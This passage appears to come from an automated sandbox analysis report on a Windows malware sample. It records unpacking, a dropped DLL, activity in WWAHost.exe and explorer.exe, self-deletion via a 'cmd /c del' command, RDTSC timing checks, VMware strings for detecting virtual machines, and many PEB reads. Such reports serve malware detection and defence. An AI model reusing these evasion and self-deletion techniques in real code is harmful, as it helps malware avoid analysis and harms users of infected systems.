          Source: Binary string: WWAHost.pdbUGP source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: DN_467842234567.exe, 00000000.00000003.669973012.000000000EAF0000.00000004.00000001.sdmp, DN_467842234567.exe, 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, WWAHost.exe, 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DN_467842234567.exe, WWAHost.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\DN_467842234567.exeUnpacked PE file: 1.2.DN_467842234567.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0040C845 push es; ret
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_004172E9 push edx; retf
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00418AE8 push ds; retf
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_0041B7C5 push eax; ret
          Source: C:\Users\user\Desktop\DN_467842234567.exeCode function: 1_2_00BDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0389D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0056C845 push es; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B87C push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B812 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B81B push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_005772E9 push edx; retf
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_00578AE8 push ds; retf
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 7_2_0057B7C5 push eax; ret
          Source: initial sampleStatic PE information: section name: .data entropy: 7.77743167322
          Source: C:\Users\user\Desktop\DN_467842234567.exeFile created: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: /c del 'C:\Users\user\Desktop\DN_467842234567.exe'
Source: C:\Users\user\Desktop\DN_467842234567.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\DN_467842234567.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DN_467842234567.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 00000000005685F4 second address: 00000000005685FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 000000000056898E second address: 0000000000568994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\explorer.exe TID: 5152 Thread sleep time: -55000s >= -30000s
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 7076 Thread sleep time: -46000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004088C0 rdtsc
Source: C:\Users\user\Desktop\DN_467842234567.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00405EC2 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_00402671 FindFirstFileA,
Source: explorer.exe, 00000004.00000000.718727163.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.715398988.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.718727163.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAa
Source: explorer.exe, 00000004.00000000.692764145.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000004.00000000.700657795.000000000A897000.00000004.00000001.sdmp Binary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}WW
Source: explorer.exe, 00000004.00000000.700657795.000000000A897000.00000004.00000001.sdmp Binary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000004.00000000.700136697.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_004088C0 rdtsc
Source: C:\Users\user\Desktop\DN_467842234567.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WWAHost.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_729156EA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_729159AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_729158FE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_729159EE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 0_2_72915A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C03884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C03884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B858EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C51074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C42073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C54015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C54015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C07016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C141E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C069A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BAB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C14257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C3B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C3B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C58A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B85210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B85210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B98A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BC927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B89240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C053CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C053CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B91B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B91B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C3D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BADBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C55BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C58B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C4131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B8DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C58CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00B9849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C414FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C1C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C41C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C5740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BA746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00C06DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BB35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DN_467842234567.exe Code function: 1_2_00BBFD9B mov eax, dword ptr fs:[00000030h]
